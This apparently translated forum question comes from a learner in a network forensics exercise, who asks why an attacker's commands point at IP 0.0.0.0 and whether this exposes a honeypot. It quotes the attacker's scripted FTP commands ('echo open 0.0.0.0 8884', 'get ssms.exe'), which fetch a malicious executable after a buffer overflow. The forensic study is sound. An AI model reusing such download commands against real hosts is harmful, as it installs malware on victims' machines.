Trabajando a través de este ejercicio en el análisis forense de redes, el atacante usó una vulnerabilidad de desbordamiento de búfer para enviar comandos a la línea de comandos de la víctima. Los comandos abren una sesión FTP y descargan algunos programas maliciosos. Estoy confundido acerca de por qué funciona con la dirección ip 0.0.0.0 Los paquetes muestran que el atacante enlaza un shell en el host de la víctima y usa FTP para forzarlo a descargar un ejecutable.
Los comandos son:
echo open 0.0.0.0 8884
echo user 1 1
echo get ssms.exe
Mi pregunta es, ¿cómo llegarían a cualquier lugar utilizando la dirección IP 0.0.0.0? ¿Está el shell enlazado de alguna manera asociado con / "en" la red del atacante mientras se está ejecutando el exploit de modo que 0.0.0.0 se resuelva en localhost en la máquina del atacante?
Algunas de las respuestas utilizaron la presencia de esta dirección IP para demostrar que la víctima era un honeypot porque aceptó cualquier dirección IP que el atacante les dio y descargó el archivo exe. Aún así, ¿cómo llegaría 0.0.0.0 a cualquier parte? Además, ¿no sería esta una buena manera para que un atacante sepa que ha pirateado un honeypot?
Una respuesta (PDF) da una buena reseña del exploit pero no aborda específicamente esta pregunta. Otra respuesta (PDF) piensa el 0.0.0.0 podría ser un error, por lo que estoy confundido.